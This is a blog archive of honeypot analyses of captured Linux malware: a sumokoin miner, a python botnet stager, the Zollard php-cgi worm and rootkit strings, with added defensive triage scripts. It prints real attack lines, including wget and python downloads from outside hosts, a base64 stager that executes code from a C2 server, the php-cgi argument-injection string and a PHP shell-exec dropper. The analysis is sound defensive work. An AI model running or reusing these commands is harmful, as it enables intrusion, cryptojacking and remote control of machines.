Archive for the ‘Honeypots’ Category

sumokoin – cryptonight

Tuesday, February 27th, 2018

Another honeypot entry caught my eye. First, the attack
itself was unusual because the malware download was executed
by a small python script instead of just running wget or curl:

uname -a
rm -f /tmp/run
if [ ` getconf LONG_BIT ` -eq 64 ]
then u="http://www.bizqsoft.com/tp2/r6.log"
else u="http://www.bizqsoft.com/tp2/r.log"
fi
wget -O /tmp/run
curl -o /tmp/run
python -c "import urllib;urllib.urlretrieve('$u','/tmp/run')"

Looking into the downloaded binary, one finds this configuration of a miner for
the cryptocoin "sumokoin" using the "cryptonight" algorithm:

{"algo":"cryptonight","av":0,"background":false,"colors":true,"cpu-affinity":null,
 "cpu-priority":null,"donate-level":5,"log-file":null,"max-cpu-usage":75,"print-time":60,
 "retries":5,"retry-pause":5,"safe":false,"syslog":false,"threads":null,
 "pools":[{"url":"pool.sumokoin.hashvault.pro:80","user":"Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon","pass":"x86_64","keepalive":true,"nicehash":false},
          {"url":"pool.sumokoin.com:3333","user":"Sumoo6Au3wBiUakx2yC748Zecr8qKa1J1eMpMCgBQCup9wPecdW7KZiTVvKXGMqvxEDJrYr8pUpDkhG5MHUjf7XX64WoxR4kxon","pass":"x86_64","keepalive":true,"nicehash":false},],
 "api":{"port":0,"access-token":null,"worker-id":null}}

(see https://coinmarketcap.com/currencies/sumokoin/ )

Looking into the blockchain explorer, I currently find no transactions linked
to that address, but that may be due to the nature of sumokoin ..
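As an added example (not code from this post or from the miner itself), here is how one can pull an embedded miner configuration like the one above out of a downloaded binary for triage: it scans the raw bytes for a JSON object starting with {"algo": and reports the pool and wallet indicators. The sample bytes are constructed and the wallet is a placeholder; the trailing-comma handling exists because the captured config ends its pool list with `},]`, which strict JSON parsers reject.

```python
import json
import re

# Constructed stand-in for the downloaded binary: ELF-like bytes around an embedded
# miner config shaped like the captured one; the wallet is a labelled placeholder.
SAMPLE_BINARY = (
    b"\x7fELF\x01\x01\x01" + b"\x00" * 9 + b"/proc/self/exe\x00"
    + b'{"algo":"cryptonight","donate-level":5,"max-cpu-usage":75,"threads":null,'
    b'"pools":[{"url":"pool.sumokoin.hashvault.pro:80","user":"SumooPLACEHOLDERWALLET","pass":"x86_64"},'
    b'{"url":"pool.sumokoin.com:3333","user":"SumooPLACEHOLDERWALLET","pass":"x86_64"},],'
    b'"api":{"port":0,"access-token":null}}' + b"\x00" * 4 + b"uname -a\x00"
)

TRAILING_COMMA = re.compile(r",\s*([\]}])")  # the `},]` in the captured config is not strict JSON

def extract_json_objects(blob, marker=b'{"algo":'):
    """Parse every brace-balanced JSON object in `blob` that begins with `marker`.
    Trailing commas are stripped before json.loads; unparseable candidates are skipped."""
    found, start = [], blob.find(marker)
    while start != -1:
        depth, in_str, esc, end = 0, False, False, None
        for i in range(start, len(blob)):
            c = blob[i]
            if in_str:  # inside a JSON string: braces do not count, track escapes
                if esc: esc = False
                elif c == 0x5C: esc = True      # backslash escapes the next byte
                elif c == 0x22: in_str = False  # unescaped quote closes the string
            elif c == 0x22: in_str = True
            elif c == 0x7B: depth += 1          # '{'
            elif c == 0x7D:                     # '}'
                depth -= 1
                if depth == 0:
                    end = i + 1
                    break
        if end is None:  # unterminated object (truncated dump): stop scanning
            break
        text = TRAILING_COMMA.sub(r"\1", blob[start:end].decode("utf-8", "replace"))
        try:
            found.append(json.loads(text))
        except ValueError:
            pass
        start = blob.find(marker, end)
    return found

def mining_indicators(config):
    """(pool, wallet) pairs a defender needs for egress blocking and abuse reports."""
    return [(p.get("url"), p.get("user")) for p in config.get("pools", [])]
```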

Linux Botnet

Wednesday, January 10th, 2018

Another nice ssh honeypot catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC
AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW
dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That downloads a complete base64-encoded python program from http://k.zsw8.cc/Api/

In that program a crontab entry is made:

    if runCodePath not in crontabData:
        f = open("/etc/crontab", "a+")
        f.write("\n0 */6 * * * root %s\n" % runCodePath)

then it uploads data about the hacked server to the herder:

    my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
    f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

    if data.has_key("download") and data["download"]:
        DownExec(data["download"], task_id)
    if data.has_key("cmd") and data["cmd"]:
        CmdExec(data["cmd"], task_id)

I wonder what would happen if the computer name were a beef-xss hook or something..?

Honeypot detection

Wednesday, April 26th, 2017

My honeypots are sending out complaints on every single successful login.

Recently I saw the following logged entry in the complaint:

echo -en "\\x31\\x33\\x33\\x37"
cat /bin/ls

Now neither kippo nor cowrie, as sshd honeypots, have a file "/bin/ls" that could be looked at, so a 'cat /bin/ls' just results in:

'cat: /bin/ls: No such file or directory'

So this seems to be an easy and reliable way to test for a standard sshd honeypot..
Not surprisingly, \\x31\\x33\\x33\\x37 simply translates to "1337", which I interpret as a smiley left by the hacker ..
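As an added example that is not part of either post, the following Python triage helper covers both the base64 stager command from the "Linux Botnet" post above and the "1337" / cat /bin/ls fingerprinting sequence in this post: it decodes the exec(base64.b64decode(...)) payload and lists the URLs it contacts, decodes echo -e hex escapes, and tags reads of /bin binaries as honeypot probes. The log lines, the stand-in stager script and the C2 hostname are constructed, and treating any cat /bin/... as a probe generalises the single /bin/ls case described above.

```python
import base64
import re

# Constructed sample log lines modelled on the two captures above; the base64 payload is
# built from a harmless stand-in script and the C2 host is a placeholder.
STAGER_SRC = ("import urllib,base64\nwhile True:\n    try:\n        exec(base64.b64decode("
              "urllib.urlopen(\"http://c2.example.invalid/Api/\").read()))\n    except:\n        pass\n")
SAMPLE_LOG = [
    "CMD: uname nohup python -c \"import base64;exec(base64.b64decode('%s'))\" > /dev/null 2>&1 &"
    % base64.b64encode(STAGER_SRC.encode()).decode(),
    'CMD: echo -en "\\x31\\x33\\x33\\x37"',
    "CMD: cat /bin/ls",
    "CMD: uname -a",
]

B64_EXEC = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
ECHO_HEX = re.compile(r'echo\s+-[a-z]*e[a-z]*\s+"((?:\\\\?x[0-9a-fA-F]{2})+)"')
HEX_BYTE = re.compile(r"\\\\?x([0-9a-fA-F]{2})")
URL = re.compile(r"https?://[^\s\"'<>)]+")
PROBE_CMD = re.compile(r"\bcat\s+/bin/\S+")  # assumption: reading any /bin binary is a probe

def decode_stagers(line):
    """Decoded text of every base64 payload handed to exec() via b64decode('...') in `line`."""
    out = []
    for m in B64_EXEC.finditer(line):
        try:
            out.append(base64.b64decode(m.group(1)).decode("utf-8", "replace"))
        except ValueError:
            pass
    return out

def decode_echo_hex(line):
    """Plain text of an 'echo -e "\\x31..."' argument, or None if the line has none."""
    m = ECHO_HEX.search(line)
    if not m:
        return None
    return bytes(int(h, 16) for h in HEX_BYTE.findall(m.group(1))).decode("latin-1")

def triage(line):
    """Classify one captured command: decoded stager URLs, decoded echo marker, probe status."""
    payloads = decode_stagers(line)
    urls = sorted({u for p in payloads for u in URL.findall(p)})
    tags = []
    if payloads: tags.append("base64-stager")
    if any("exec(" in p and "urlopen(" in p for p in payloads): tags.append("remote-code-beacon")
    marker = decode_echo_hex(line)
    if marker: tags.append("echo-marker:" + marker)
    if PROBE_CMD.search(line): tags.append("honeypot-probe")
    return {"urls": urls, "tags": tags}
```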

~7000 ssh logins

Tuesday, January 5th, 2016

Recently I looked into some honeypot results, which ended in finding the URL

http://185.62.190.222/r1

(Warning: without the /r1 you are forced into a fake Adobe update).

Looking around further I found (besides some scanner tools, code, etc.) two files, stage1 and stage2, under the subdir /r4, containing about 7000 username:password:ip-address combinations. And yes, I found some of my honeypot addresses in there 🙂 Though I am pretty sure that most of the addresses will be honeypots, I will try to send out mails to the appropriate abuse contacts; maybe some of them are for real.

chinese linux-rootkit

Friday, July 18th, 2014

Once in a while I take a look in the downloaded files from the ssh-honeypot.

Lately I saw a download of "linux-2.6.27.el6", which made me wonder.

If you are interested: there are more files available for download at http://222.186.15.13:8520/ .. probably all trojans and rootkits..

The known protocols of that kit include even gopher 🙂

gopher
http
https
file
news
mailto
socks

A quick "strings" on that file showed a lot of Chinese IP addresses, plus some replaced commands (netstat, ps, lsof) and a few additional strings that look like length-prefixed C++ class names of attack modules:

11CAttackBase
13CPacketAttack
10CAttackUdp
10CAttackSyn
11CAttackIcmp
10CAttackDns
10CAttackAmp
10CAttackPrx
15CAttackCompress
10CTcpAttack
9CAttackCc
10CAttackTns
9CAttackIe
7CSerial

A short excerpt (maybe these addresses are known elsewhere?):


MinCoin

Friday, January 10th, 2014

I am not up to date..

Looking at http://p2pool.org/ I see not only BitCoin storage, but also FeatherCoin, LiteCoin, MemeCoin, Terra, FreiCoin, LottoCoin and other stuff..

Whew.. I did not think that there are so many crypto currencies out there.

I found this because my honeypot captured a link to

http://110.154.103.80:58455/x86 ( e66eb75f05328783c23745ef9d573de1 )

(I mentioned this program earlier (x86), but with a different md5-hash..)

Looking at the “x86” program one can find the installation of a miner for “MinCoins”, storing them at p2pool.org.

I am wondering why not even one of the VirusTotal engines thinks that this is malware..

disknyp 3

Monday, December 16th, 2013

disknyp doesn’t seem to be a new thing..

In the paper:

PATTERNS AND PATTER: AN INVESTIGATION INTO SSH ACTIVITY USING KIPPO HONEYPOTS
Craig Valli, Priya Rabadia and Andrew Woodward
Edith Cowan University, Security Research Institute, Perth, Australia
c.valli@ecu.edu.au, prabadia@our.ecu.edu.au, a.woodward@ecu.edu.a

(to be found at http://ro.ecu.edu.au/cgi/viewcontent.cgi?article=1126&context=adf ) the download URL is already mentioned. clean-mx also knows the file host, and http://honey1.christiaan008.tk:8080/kippo-graph/kippo-input.php also gives a good look at these activities.

disknyp 2

Monday, December 16th, 2013

Meanwhile I captured 268 samples of disknyp.

It can be found at: http://198.2.192.204:22/disknyp

cool .. webserver on the ssh-port 🙂

The server answers with:

Content-Type: text/html
Content-Length: 4440
Accept-Ranges: bytes
Server: HFS 2.3 beta
Cache-Control: no-cache, no-store, must-revalidate, max-age=-1

It looks like the running webserver is from:

http://ha-hfs.googlecode.com/files/hfs2.3 beta271.exe

Also available for download on this webserver is a svch.exe, probably infected, for Windows machines.

VirusTotal says only 24 of 48 antivirus vendors detect this trojan.

MD5 9d37ef3a5388b1d3d67a8759f178dd2d
SHA1 c09437f9d2752fc8ded68429ac33392c846370fc
SHA256 5c7d2aa53e55977b1bd677d6a3415c7e9900769fc49e9e3bed1fd42d73f0381b

disknyp

Monday, December 2nd, 2013

Yesterday my ssh-honeypot captured 54 samples of “disknyp”.

All logins (probably automated) did the following:

**:~# rm -f disknyp
**:~# rm -f disknop
**:~# wget http://198.2.192.204:22/disknyp
–2013-12-01 03:58:03–  http://198.2.192.204:22/disknyp
Connecting to 198.2.192.204:22… connected.
HTTP request sent, awaiting response… 503 ?????????
**:~# chmod 0777 disknyp
**:~# nohup /root/disknyp > /dev/null 2>&1 &
bash: nohup: command not found
**x:>

The file is a 1491887-byte ELF 32-bit LSB executable. I don't know yet what it is doing..

linux binary

Tuesday, November 12th, 2013

Recently my nepenthes stopped working. Looking into the last log lines I found a wget line:

[12112013 06:25:07 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

So I took a look at this binary, which I could download from this location.

# file x86
x86: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, stripped

Next look: try "strings". At first nothing new.. but then I saw:

/proc/self/exe
POST
?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%6
4+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%
73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%
75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%
72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%
65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%
5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%
74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%30+%2D%6E HTTP/1.1
Host:
User-Agent: Zollard
Content-Type: application/x-www-form-urlencoded
Content-Length:
Connection: close
<?php
$disablefunc = @ini_get("disable_functions");
if (!empty($disablefunc))
$disablefunc = str_replace(" ","",$disablefunc);
$disablefunc = explode(",",$disablefunc);

What the heck..? And who is "zollard"?

#### Update  ####

The POST Part resolves to:

?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env=0 -n

###############
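The decoded string above is the php-cgi argument-injection trick: the raw query contains no literal "=" (only %3D), so a vulnerable php-cgi splits it on "+" and treats the pieces as command-line options. As an added example (not from the post or from Zollard), this Python scanner finds such requests in a web server access log by decoding the query the way php-cgi's form parser does and listing the php.ini directives forced through -d. The log lines are constructed; the first one carries three of the options from the string above.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines (Common Log Format). The first carries the percent-
# encoded php-cgi argument string quoted above, shortened to three of its options.
SAMPLE_ACCESS_LOG = [
    '203.0.113.5 - - [12/Nov/2013:06:25:07 +0000] "POST /?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C'
    '%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69'
    '%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 200 512 "-" "Zollard"',
    '203.0.113.6 - - [12/Nov/2013:06:25:09 +0000] "GET /index.php?page=2 HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]

REQUEST_LINE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')

def decode_query(target):
    """Query string of a request target as php-cgi's argument parser sees it:
    '+' becomes a space and %XX escapes are resolved; '' when there is no query."""
    _, sep, query = target.partition("?")
    return unquote_plus(query) if sep else ""

def injected_ini_directives(target):
    """php.ini directive names an attacker tries to force via '-d name=value' in the
    query string; [] when the decoded query does not look like a CLI argument list."""
    decoded = decode_query(target)
    if not decoded.lstrip().startswith("-"):
        return []
    return re.findall(r"-d\s+([A-Za-z_.]+)=", decoded)

def scan_access_log(lines):
    """Return (line index, injected directives) for every request carrying php-cgi
    option injection; clean lines and lines without a request field are ignored."""
    hits = []
    for i, line in enumerate(lines):
        m = REQUEST_LINE.search(line)
        if m:
            directives = injected_ini_directives(m.group("target"))
            if directives:
                hits.append((i, directives))
    return hits
```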

 

further on:

function myshellexec($cmd)
{
    global $disablefunc;
    $result = "";
    if (!empty($cmd))
    {
        if (is_callable("exec") and !in_array("exec",$disablefunc)) {exec($cmd,$result); $result = join("\n",$result);}
        elseif (($result = `$cmd`) !== FALSE) {}
        elseif (is_callable("system") and !in_array("system",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); system($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
        elseif (is_callable("passthru") and !in_array("passthru",$disablefunc)) {$v = @ob_get_contents(); @ob_clean(); passthru($cmd); $result = @ob_get_contents(); @ob_clean(); echo $v;}
        elseif (is_resource($fp = popen($cmd,"r")))
        {
            $result = "";
            while(!feof($fp)) {$result .= fread($fp,1024);}
            pclose($fp);
        }
    }
    return $result;
}
myshellexec("wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");

Now the binary loads another binary, executes it and starts a webserver?

myshellexec("wget -O /tmp/x86 http://www.solarteure-landkirchen.de/solar/x86");
myshellexec("chmod +x /tmp/x86");
myshellexec("/tmp/x86");
HTTP/1.1 200 OK
httpd

A few lines more: it installs "iptables", drops every telnet connection and starts its own telnet daemon:

insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/ip_tables.ko
insmod /lib/modules/`uname -r`/kernel/net/ipv4/netfilter/iptable_filter.ko
iptables -D INPUT -p tcp --dport 23 -j DROP
iptables -A INPUT -p tcp --dport 23 -j DROP
telnetd

In the end the program removes its sources (rm -rf) and runs from the directory created by

mkdir -p
/var/run/.zollard/

The last lines:

chmod +x
cp /bin/sh
1234
12345
dreambox
smcadmin
stemroot
0!0
SHA1

So it ends up with some kind of crypto..

VirusTotal shows a hit rate of 2 out of 47; well, it is no Windows binary..

Anyone seen this before? Who is zollard? Where did the binary get the necessary root credentials from? I guess I have to take a further look..

#### Update ####

There were quite a lot of download-trials today:

# grep gpharma nepenthes.log | wc -l
33348

which come from log lines like:

[12112013 09:23:43 debug info fixme] File info submitted (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)
[12112013 09:23:43 debug info fixme] File upload requested (ebee4228eb3443cd8d55228733b8c1c6, http://www.gpharma.co/x86)

#### Update 2 ####

I executed the binary on a Linux VMware guest after adding "o+x" rights to it.

The iptables lines generate errors:

error inserting … ip_tables.ko - Unknown symbol in module

Immediately the machine starts exchanging traffic with 117.201.16.108:58455 and also starts listening on this port 58455.

It looks like my machine started scanning the ip range 117.201.16.* on that port; I receive answers from there... No httpd or telnetd daemons are listening according to "ps", which I had expected.

The command "pstree" shows a httpd, though! Different children are running; the last one has a connection to 117.201.18.22..23..24.. Looks like the "ps" executable has been changed.
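As an added example (not from the post), here is the kind of cross-check that explains the ps/pstree disagreement above, and that applies just as well to the replaced netstat/ps/lsof mentioned in the "chinese linux-rootkit" post further up: compare the PIDs the kernel exposes in /proc with what the ps binary reports. The /proc listing and ps output below are constructed; live_check() runs the same comparison on a real Linux host.

```python
import os
import re
import subprocess

# Constructed snapshots standing in for os.listdir("/proc") and `ps -e -o pid=` output
# on a host whose ps binary has been replaced to hide PID 1337.
SAMPLE_PROC_ENTRIES = ["1", "2", "cpuinfo", "1337", "4242", "self", "meminfo", "net"]
SAMPLE_PS_OUTPUT = "    1\n    2\n 4242\n"

def pids_from_proc_listing(entries):
    """PIDs in the kernel's /proc view: the purely numeric directory names."""
    return {int(e) for e in entries if e.isdigit()}

def pids_from_ps_output(text):
    """PIDs reported by `ps -e -o pid=` (one PID per line, possibly padded)."""
    return {int(m) for m in re.findall(r"^\s*(\d+)\s*$", text, re.M)}

def hidden_pids(proc_pids, ps_pids):
    """PIDs the kernel exposes but the userland ps tool leaves out."""
    return sorted(proc_pids - ps_pids)

def live_check():
    """Run the comparison on this Linux host and return the PIDs ps hides.
    A process that exits between the two snapshots would look hidden, so each
    candidate is re-checked against /proc before it is reported."""
    proc = pids_from_proc_listing(os.listdir("/proc"))
    out = subprocess.run(["ps", "-e", "-o", "pid="], capture_output=True, text=True).stdout
    candidates = hidden_pids(proc, pids_from_ps_output(out))
    return [p for p in candidates if os.path.isdir("/proc/%d" % p)]

if __name__ == "__main__":
    print("PIDs present in /proc but missing from ps:", live_check())
```

A kernel-level rootkit that also filters /proc will not show up here; pstree reads /proc directly, which is why it could still show the httpd that the replaced ps omitted.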

Will see what else can be found. Now it is "St. Martin" time.. :-)